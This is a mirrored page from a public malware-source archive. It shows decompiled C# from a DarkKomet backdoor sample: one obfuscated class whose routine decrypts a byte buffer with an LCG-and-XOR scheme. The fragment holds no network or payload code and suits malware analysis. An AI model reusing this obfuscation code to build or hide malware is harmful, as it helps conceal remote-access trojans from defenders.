mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-20 00:58:52 +00:00
f2ac1ece55
add
32 lines
1.1 KiB
C#
32 lines
1.1 KiB
C#
// Decompiled with JetBrains decompiler
|
||
// Type:
|
||
// Assembly: 10-June, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
||
// MVID: 2713F504-3EB6-448B-931C-99CD142737FF
|
||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.DarkKomet.flmi-c6a635f08367ebc14e97e098c251f12ec8876284411ed7ac0b77e79a540debb3.exe
|
||
|
||
internal static class \u000F
|
||
{
|
||
public static byte[] \u0002(byte[] _param0, byte[] _param1)
|
||
{
|
||
byte num1 = _param0[1];
|
||
int length = _param1.Length;
|
||
byte num2 = (byte) (length + 11 ^ (int) num1 + 7);
|
||
uint num3 = (uint) (((int) _param0[0] | (int) _param0[2] << 8) + ((int) num2 << 3));
|
||
ushort num4 = 0;
|
||
for (int index = 0; index < length; ++index)
|
||
{
|
||
if ((index & 1) == 0)
|
||
{
|
||
num3 = (uint) ((int) num3 * 214013 + 2531011);
|
||
num4 = (ushort) (num3 >> 16);
|
||
}
|
||
byte num5 = (byte) num4;
|
||
num4 >>= 8;
|
||
byte num6 = _param1[index];
|
||
_param1[index] = (byte) ((uint) ((int) num6 ^ (int) num1 ^ (int) num2 + 3) ^ (uint) num5);
|
||
num2 = num6;
|
||
}
|
||
return _param1;
|
||
}
|
||
}
|